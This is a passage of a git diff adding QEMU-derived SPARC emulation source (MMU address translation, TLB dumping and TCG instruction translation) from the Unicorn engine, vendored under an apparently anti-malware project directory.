*/ + *page_size = TARGET_PAGE_SIZE; + + /* safety net to catch wrong softmmu index use from dynamic code */ + if (env->tl > 0 && mmu_idx != MMU_NUCLEUS_IDX) { + if (rw == 2) { + //trace_mmu_helper_get_phys_addr_code(env->tl, mmu_idx, + // env->dmmu.mmu_primary_context, + // env->dmmu.mmu_secondary_context, + // address); + } else { + //trace_mmu_helper_get_phys_addr_data(env->tl, mmu_idx, + // env->dmmu.mmu_primary_context, + // env->dmmu.mmu_secondary_context, + // address); + } + } + + if (rw == 2) { + return get_physical_address_code(env, physical, prot, address, + mmu_idx); + } else { + return get_physical_address_data(env, physical, prot, address, rw, + mmu_idx); + } +} + +/* Perform address translation */ +int sparc_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + target_ulong vaddr; + hwaddr paddr; + target_ulong page_size; + int error_code = 0, prot, access_index; + + address &= TARGET_PAGE_MASK; + error_code = get_physical_address(env, &paddr, &prot, &access_index, + address, rw, mmu_idx, &page_size); + if (error_code == 0) { + vaddr = address; + + //trace_mmu_helper_mmu_fault(address, paddr, mmu_idx, env->tl, + // env->dmmu.mmu_primary_context, + // env->dmmu.mmu_secondary_context); + + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); + return 0; + } + /* XXX */ + return 1; +} + +void dump_mmu(FILE *f, fprintf_function cpu_fprintf, CPUSPARCState *env) +{ + unsigned int i; + const char *mask; + + (*cpu_fprintf)(f, "MMU contexts: Primary: %" PRId64 ", Secondary: %" + PRId64 "\n", + env->dmmu.mmu_primary_context, + env->dmmu.mmu_secondary_context); + if ((env->lsu & DMMU_E) == 0) { + (*cpu_fprintf)(f, "DMMU disabled\n"); + } else { + (*cpu_fprintf)(f, "DMMU dump\n"); + for (i = 0; i < 64; i++) { + switch (TTE_PGSIZE(env->dtlb[i].tte)) { + default: + case 0x0: + mask = " 8k"; + break; + case 0x1: + mask = " 64k"; + break; + case 0x2: + mask = 
"512k"; + break; + case 0x3: + mask = " 4M"; + break; + } + if (TTE_IS_VALID(env->dtlb[i].tte)) { + (*cpu_fprintf)(f, "[%02u] VA: %" PRIx64 ", PA: %llx" + ", %s, %s, %s, %s, ctx %" PRId64 " %s\n", + i, + env->dtlb[i].tag & (uint64_t)~0x1fffULL, + TTE_PA(env->dtlb[i].tte), + mask, + TTE_IS_PRIV(env->dtlb[i].tte) ? "priv" : "user", + TTE_IS_W_OK(env->dtlb[i].tte) ? "RW" : "RO", + TTE_IS_LOCKED(env->dtlb[i].tte) ? + "locked" : "unlocked", + env->dtlb[i].tag & (uint64_t)0x1fffULL, + TTE_IS_GLOBAL(env->dtlb[i].tte) ? + "global" : "local"); + } + } + } + if ((env->lsu & IMMU_E) == 0) { + (*cpu_fprintf)(f, "IMMU disabled\n"); + } else { + (*cpu_fprintf)(f, "IMMU dump\n"); + for (i = 0; i < 64; i++) { + switch (TTE_PGSIZE(env->itlb[i].tte)) { + default: + case 0x0: + mask = " 8k"; + break; + case 0x1: + mask = " 64k"; + break; + case 0x2: + mask = "512k"; + break; + case 0x3: + mask = " 4M"; + break; + } + if (TTE_IS_VALID(env->itlb[i].tte)) { + (*cpu_fprintf)(f, "[%02u] VA: %" PRIx64 ", PA: %llx" + ", %s, %s, %s, ctx %" PRId64 " %s\n", + i, + env->itlb[i].tag & (uint64_t)~0x1fffULL, + TTE_PA(env->itlb[i].tte), + mask, + TTE_IS_PRIV(env->itlb[i].tte) ? "priv" : "user", + TTE_IS_LOCKED(env->itlb[i].tte) ? + "locked" : "unlocked", + env->itlb[i].tag & (uint64_t)0x1fffULL, + TTE_IS_GLOBAL(env->itlb[i].tte) ? 
+ "global" : "local"); + } + } + } +} + +#endif /* TARGET_SPARC64 */ + +static int cpu_sparc_get_phys_page(CPUSPARCState *env, hwaddr *phys, + target_ulong addr, int rw, int mmu_idx) +{ + target_ulong page_size; + int prot, access_index; + + return get_physical_address(env, phys, &prot, &access_index, addr, rw, + mmu_idx, &page_size); +} + +#if defined(TARGET_SPARC64) +hwaddr cpu_get_phys_page_nofault(CPUSPARCState *env, target_ulong addr, + int mmu_idx) +{ + hwaddr phys_addr; + + if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 4, mmu_idx) != 0) { + return -1; + } + return phys_addr; +} +#endif + +hwaddr sparc_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + hwaddr phys_addr; + int mmu_idx = cpu_mmu_index(env); + MemoryRegionSection section; + + if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 2, mmu_idx) != 0) { + if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 0, mmu_idx) != 0) { + return -1; + } + } + section = memory_region_find(get_system_memory(cs->uc), phys_addr, 1); + memory_region_unref(section.mr); + if (!int128_nz(section.size)) { + return -1; + } + return phys_addr; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/translate.c new file mode 100644 index 0000000..f39a70e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/translate.c @@ -0,0 +1,5719 @@ +/* + SPARC translation + + Copyright (C) 2003 Thomas M. Ogrisegg + Copyright (C) 2003-2005 Fabrice Bellard + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. 
+ + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, see . + */ + +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "tcg-op.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#define DYNAMIC_PC 1 /* dynamic pc value */ +#define JUMP_PC 2 /* dynamic pc value which takes only two values + according to jump_pc[T2] */ + + +typedef struct DisasContext { + target_ulong pc; /* current Program Counter: integer or DYNAMIC_PC */ + target_ulong npc; /* next PC: integer or DYNAMIC_PC or JUMP_PC */ + target_ulong jump_pc[2]; /* used when JUMP_PC pc value is used */ + int is_br; + int mem_idx; + int fpu_enabled; + int address_mask_32bit; + int singlestep; + uint32_t cc_op; /* current CC operation */ + struct TranslationBlock *tb; + sparc_def_t *def; + TCGv_i32 t32[3]; + TCGv ttl[6]; + int n_t32; + int n_ttl; + + // Unicorn engine + struct uc_struct *uc; +} DisasContext; + +typedef struct { + TCGCond cond; + bool is_bool; + bool g1, g2; + TCGv c1, c2; +} DisasCompare; + +// This function uses non-native bit order +#define GET_FIELD(X, FROM, TO) \ + ((X) >> (31 - (TO)) & ((1 << ((TO) - (FROM) + 1)) - 1)) + +// This function uses the order in the manuals, i.e. 
bit 0 is 2^0 +#define GET_FIELD_SP(X, FROM, TO) \ + GET_FIELD(X, 31 - (TO), 31 - (FROM)) + +#define GET_FIELDs(x,a,b) sign_extend (GET_FIELD(x,a,b), (b) - (a) + 1) +#define GET_FIELD_SPs(x,a,b) sign_extend (GET_FIELD_SP(x,a,b), ((b) - (a) + 1)) + +#ifdef TARGET_SPARC64 +#define DFPREG(r) (((r & 1) << 5) | (r & 0x1e)) +#define QFPREG(r) (((r & 1) << 5) | (r & 0x1c)) +#else +#define DFPREG(r) (r & 0x1e) +#define QFPREG(r) (r & 0x1c) +#endif + +#define UA2005_HTRAP_MASK 0xff +#define V8_TRAP_MASK 0x7f + +static int sign_extend(int x, int len) +{ + len = 32 - len; + return ((int)(((unsigned int)x) << len)) >> len; +} + +#define IS_IMM (insn & (1<<13)) + +static inline TCGv_i32 get_temp_i32(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 t; + assert(dc->n_t32 < ARRAY_SIZE(dc->t32)); + dc->t32[dc->n_t32++] = t = tcg_temp_new_i32(tcg_ctx); + return t; +} + +static inline TCGv get_temp_tl(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t; + assert(dc->n_ttl < ARRAY_SIZE(dc->ttl)); + dc->ttl[dc->n_ttl++] = t = tcg_temp_new(tcg_ctx); + return t; +} + +static inline void gen_update_fprs_dirty(DisasContext *dc, int rd) +{ +#if defined(TARGET_SPARC64) + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_ori_i32(tcg_ctx, tcg_ctx->cpu_fprs, tcg_ctx->cpu_fprs, (rd < 32) ? 
1 : 2); +#endif +} + +/* floating point registers moves */ +static TCGv_i32 gen_load_fpr_F(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; +#if TCG_TARGET_REG_BITS == 32 + if (src & 1) { + return TCGV_LOW(tcg_ctx->cpu_fpr[src / 2]); + } else { + return TCGV_HIGH(tcg_ctx->cpu_fpr[src / 2]); + } +#else + if (src & 1) { + return MAKE_TCGV_I32(GET_TCGV_I64(tcg_ctx->cpu_fpr[src / 2])); + } else { + TCGv_i32 ret = get_temp_i32(dc); + TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->cpu_fpr[src / 2], 32); + tcg_gen_trunc_i64_i32(tcg_ctx, ret, t); + tcg_temp_free_i64(tcg_ctx, t); + + return ret; + } +#endif +} + +static void gen_store_fpr_F(DisasContext *dc, unsigned int dst, TCGv_i32 v) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; +#if TCG_TARGET_REG_BITS == 32 + if (dst & 1) { + tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx->cpu_fpr[dst / 2]), v); + } else { + tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx->cpu_fpr[dst / 2]), v); + } +#else + TCGv_i64 t = MAKE_TCGV_I64(GET_TCGV_I32(v)); + tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_fpr[dst / 2], t, + (dst & 1 ? 
0 : 32), 32); +#endif + gen_update_fprs_dirty(dc, dst); +} + +static TCGv_i32 gen_dest_fpr_F(DisasContext *dc) +{ + return get_temp_i32(dc); +} + +static TCGv_i64 gen_load_fpr_D(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + src = DFPREG(src); + return tcg_ctx->cpu_fpr[src / 2]; +} + +static void gen_store_fpr_D(DisasContext *dc, unsigned int dst, TCGv_i64 v) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + dst = DFPREG(dst); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], v); + gen_update_fprs_dirty(dc, dst); +} + +static TCGv_i64 gen_dest_fpr_D(DisasContext *dc, unsigned int dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + return tcg_ctx->cpu_fpr[DFPREG(dst) / 2]; +} + +static void gen_op_load_fpr_QT0(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.upper)); + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.lower)); +} + +static void gen_op_load_fpr_QT1(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + + offsetof(CPU_QuadU, ll.upper)); + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + + offsetof(CPU_QuadU, ll.lower)); +} + +static void gen_op_store_QT0_fpr(DisasContext *dc, unsigned int dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.upper)); + tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.lower)); +} + +#ifdef TARGET_SPARC64 +static void gen_move_Q(DisasContext *dc, unsigned int rd, unsigned int rs) +{ 
+ TCGContext *tcg_ctx = dc->uc->tcg_ctx; + rd = QFPREG(rd); + rs = QFPREG(rs); + + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], tcg_ctx->cpu_fpr[rs / 2]); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + 1], tcg_ctx->cpu_fpr[rs / 2 + 1]); + gen_update_fprs_dirty(dc, rd); +} +#endif + +/* moves */ +#ifdef CONFIG_USER_ONLY +#define supervisor(dc) 0 +#ifdef TARGET_SPARC64 +#define hypervisor(dc) 0 +#endif +#else +#define supervisor(dc) (dc->mem_idx >= MMU_KERNEL_IDX) +#ifdef TARGET_SPARC64 +#define hypervisor(dc) (dc->mem_idx == MMU_HYPV_IDX) +#else +#endif +#endif + +#ifdef TARGET_SPARC64 +#ifndef TARGET_ABI32 +#define AM_CHECK(dc) ((dc)->address_mask_32bit) +#else +#define AM_CHECK(dc) (1) +#endif +#endif + +static inline void gen_address_mask(DisasContext *dc, TCGv addr) +{ +#ifdef TARGET_SPARC64 + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (AM_CHECK(dc)) + tcg_gen_andi_tl(tcg_ctx, addr, addr, 0xffffffffULL); +#endif +} + +static inline TCGv gen_load_gpr(DisasContext *dc, int reg) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (reg == 0 || reg >= 8) { + TCGv t = get_temp_tl(dc); + if (reg == 0) { + tcg_gen_movi_tl(tcg_ctx, t, 0); + } else { + tcg_gen_ld_tl(tcg_ctx, t, tcg_ctx->cpu_regwptr, (reg - 8) * sizeof(target_ulong)); + } + return t; + } else { + TCGv **cpu_gregs = (TCGv **)tcg_ctx->cpu_gregs; + return *cpu_gregs[reg]; + } +} + +static inline void gen_store_gpr(DisasContext *dc, int reg, TCGv v) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (reg > 0) { + if (reg < 8) { + TCGv **cpu_gregs = (TCGv **)tcg_ctx->cpu_gregs; + tcg_gen_mov_tl(tcg_ctx, *cpu_gregs[reg], v); + } else { + tcg_gen_st_tl(tcg_ctx, v, tcg_ctx->cpu_regwptr, (reg - 8) * sizeof(target_ulong)); + } + } +} + +static inline TCGv gen_dest_gpr(DisasContext *dc, int reg) +{ + if (reg == 0 || reg >= 8) { + return get_temp_tl(dc); + } else { + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv **cpu_gregs = (TCGv **)tcg_ctx->cpu_gregs; + return *cpu_gregs[reg]; + } +} + +static inline void 
gen_goto_tb(DisasContext *s, int tb_num, + target_ulong pc, target_ulong npc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TranslationBlock *tb; + + tb = s->tb; + if ((pc & TARGET_PAGE_MASK) == (tb->pc & TARGET_PAGE_MASK) && + (npc & TARGET_PAGE_MASK) == (tb->pc & TARGET_PAGE_MASK) && + !s->singlestep) { + /* jump to same page: we can use a direct jump */ + tcg_gen_goto_tb(tcg_ctx, tb_num); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, pc); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, npc); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + tb_num); + } else { + /* jump to another page: currently not optimized */ + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, pc); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, npc); + tcg_gen_exit_tb(tcg_ctx, 0); + } +} + +// XXX suboptimal +static inline void gen_mov_reg_N(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_NEG_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_Z(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_ZERO_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_V(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_OVF_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_C(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_CARRY_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +#if 0 +static inline void gen_op_addi_cc(DisasContext *dc, TCGv dst, TCGv src1, target_long src2) +{ + TCGContext 
*tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, src2); + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} +#endif + +static inline void gen_op_add_cc(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_add_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src2); + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} + +static TCGv_i32 gen_add32_carry32(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32, cc_src1_32, cc_src2_32; + + /* Carry is computed from a previous add: (dst < src) */ +#if TARGET_LONG_BITS == 64 + cc_src1_32 = tcg_temp_new_i32(tcg_ctx); + cc_src2_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src1_32, *(TCGv *)tcg_ctx->cpu_cc_dst); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src2_32, *(TCGv *)tcg_ctx->cpu_cc_src); +#else + cc_src1_32 = *(TCGv *)tcg_ctx->cpu_cc_dst; + cc_src2_32 = *(TCGv *)tcg_ctx->cpu_cc_src; +#endif + + carry_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); + +#if TARGET_LONG_BITS == 64 + tcg_temp_free_i32(tcg_ctx, cc_src1_32); + tcg_temp_free_i32(tcg_ctx, cc_src2_32); +#endif + + return carry_32; +} + +static TCGv_i32 gen_sub32_carry32(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32, cc_src1_32, cc_src2_32; + + /* Carry is computed from a previous borrow: (src1 < src2) */ +#if TARGET_LONG_BITS == 64 + cc_src1_32 = tcg_temp_new_i32(tcg_ctx); + cc_src2_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src1_32, *(TCGv 
*)tcg_ctx->cpu_cc_src); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src2_32, *(TCGv *)tcg_ctx->cpu_cc_src2); +#else + cc_src1_32 = *(TCGv *)tcg_ctx->cpu_cc_src; + cc_src2_32 = *(TCGv *)tcg_ctx->cpu_cc_src2; +#endif + + carry_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); + +#if TARGET_LONG_BITS == 64 + tcg_temp_free_i32(tcg_ctx, cc_src1_32); + tcg_temp_free_i32(tcg_ctx, cc_src2_32); +#endif + + return carry_32; +} + +static void gen_op_addx_int(DisasContext *dc, TCGv dst, TCGv src1, + TCGv src2, int update_cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32; + TCGv carry; + + switch (dc->cc_op) { + case CC_OP_DIV: + case CC_OP_LOGIC: + /* Carry is known to be zero. Fall back to plain ADD. */ + if (update_cc) { + gen_op_add_cc(dc, dst, src1, src2); + } else { + tcg_gen_add_tl(tcg_ctx, dst, src1, src2); + } + return; + + case CC_OP_ADD: + case CC_OP_TADD: + case CC_OP_TADDTV: + if (TARGET_LONG_BITS == 32) { + /* We can re-use the host's hardware carry generation by using + an ADD2 opcode. We discard the low part of the output. + Ideally we'd combine this operation with the add that + generated the carry in the first place. */ + carry = tcg_temp_new(tcg_ctx); + tcg_gen_add2_tl(tcg_ctx, carry, dst, *(TCGv *)tcg_ctx->cpu_cc_src, src1, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_temp_free(tcg_ctx, carry); + goto add_done; + } + carry_32 = gen_add32_carry32(dc); + break; + + case CC_OP_SUB: + case CC_OP_TSUB: + case CC_OP_TSUBTV: + carry_32 = gen_sub32_carry32(dc); + break; + + default: + /* We need external help to produce the carry. 
*/ + carry_32 = tcg_temp_new_i32(tcg_ctx); + gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); + break; + } + +#if TARGET_LONG_BITS == 64 + carry = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); +#else + carry = carry_32; +#endif + + tcg_gen_add_tl(tcg_ctx, dst, src1, src2); + tcg_gen_add_tl(tcg_ctx, dst, dst, carry); + + tcg_temp_free_i32(tcg_ctx, carry_32); +#if TARGET_LONG_BITS == 64 + tcg_temp_free(tcg_ctx, carry); +#endif + + add_done: + if (update_cc) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADDX); + dc->cc_op = CC_OP_ADDX; + } +} + +#if 0 +static inline void gen_op_subi_cc(DisasContext *dc, TCGv dst, TCGv src1, target_long src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + if (src2 == 0) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, src1); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } else { + tcg_gen_subi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, src2); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); + dc->cc_op = CC_OP_SUB; + } + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} +#endif + +static inline void gen_op_sub_cc(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_sub_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src2); + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} + +static void gen_op_subx_int(DisasContext *dc, TCGv dst, 
TCGv src1, + TCGv src2, int update_cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32; + TCGv carry; + + switch (dc->cc_op) { + case CC_OP_DIV: + case CC_OP_LOGIC: + /* Carry is known to be zero. Fall back to plain SUB. */ + if (update_cc) { + gen_op_sub_cc(dc, dst, src1, src2); + } else { + tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); + } + return; + + case CC_OP_ADD: + case CC_OP_TADD: + case CC_OP_TADDTV: + carry_32 = gen_add32_carry32(dc); + break; + + case CC_OP_SUB: + case CC_OP_TSUB: + case CC_OP_TSUBTV: + if (TARGET_LONG_BITS == 32) { + /* We can re-use the host's hardware carry generation by using + a SUB2 opcode. We discard the low part of the output. + Ideally we'd combine this operation with the add that + generated the carry in the first place. */ + carry = tcg_temp_new(tcg_ctx); + tcg_gen_sub2_tl(tcg_ctx, carry, dst, *(TCGv *)tcg_ctx->cpu_cc_src, src1, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_temp_free(tcg_ctx, carry); + goto sub_done; + } + carry_32 = gen_sub32_carry32(dc); + break; + + default: + /* We need external help to produce the carry. 
*/ + carry_32 = tcg_temp_new_i32(tcg_ctx); + gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); + break; + } + +#if TARGET_LONG_BITS == 64 + carry = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); +#else + carry = carry_32; +#endif + + tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); + tcg_gen_sub_tl(tcg_ctx, dst, dst, carry); + + tcg_temp_free_i32(tcg_ctx, carry_32); +#if TARGET_LONG_BITS == 64 + tcg_temp_free(tcg_ctx, carry); +#endif + + sub_done: + if (update_cc) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUBX); + dc->cc_op = CC_OP_SUBX; + } +} + +static inline void gen_op_mulscc(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv r_temp, zero, t0; + + r_temp = tcg_temp_new(tcg_ctx); + t0 = tcg_temp_new(tcg_ctx); + + /* old op: + if (!(env->y & 1)) + T1 = 0; + */ + zero = tcg_const_tl(tcg_ctx, 0); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1, 0xffffffff); + tcg_gen_andi_tl(tcg_ctx, r_temp, *(TCGv *)tcg_ctx->cpu_y, 0x1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2, 0xffffffff); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->cpu_cc_src2, r_temp, zero, + zero, *(TCGv *)tcg_ctx->cpu_cc_src2); + tcg_temp_free(tcg_ctx, zero); + + // b2 = T0 & 1; + // env->y = (b2 << 31) | (env->y >> 1); + tcg_gen_andi_tl(tcg_ctx, r_temp, *(TCGv *)tcg_ctx->cpu_cc_src, 0x1); + tcg_gen_shli_tl(tcg_ctx, r_temp, r_temp, 31); + tcg_gen_shri_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->cpu_y, 1); + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x7fffffff); + tcg_gen_or_tl(tcg_ctx, t0, t0, r_temp); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_y, t0, 0xffffffff); + + // b1 = N ^ V; + gen_mov_reg_N(dc, t0, tcg_ctx->cpu_psr); + gen_mov_reg_V(dc, r_temp, tcg_ctx->cpu_psr); + 
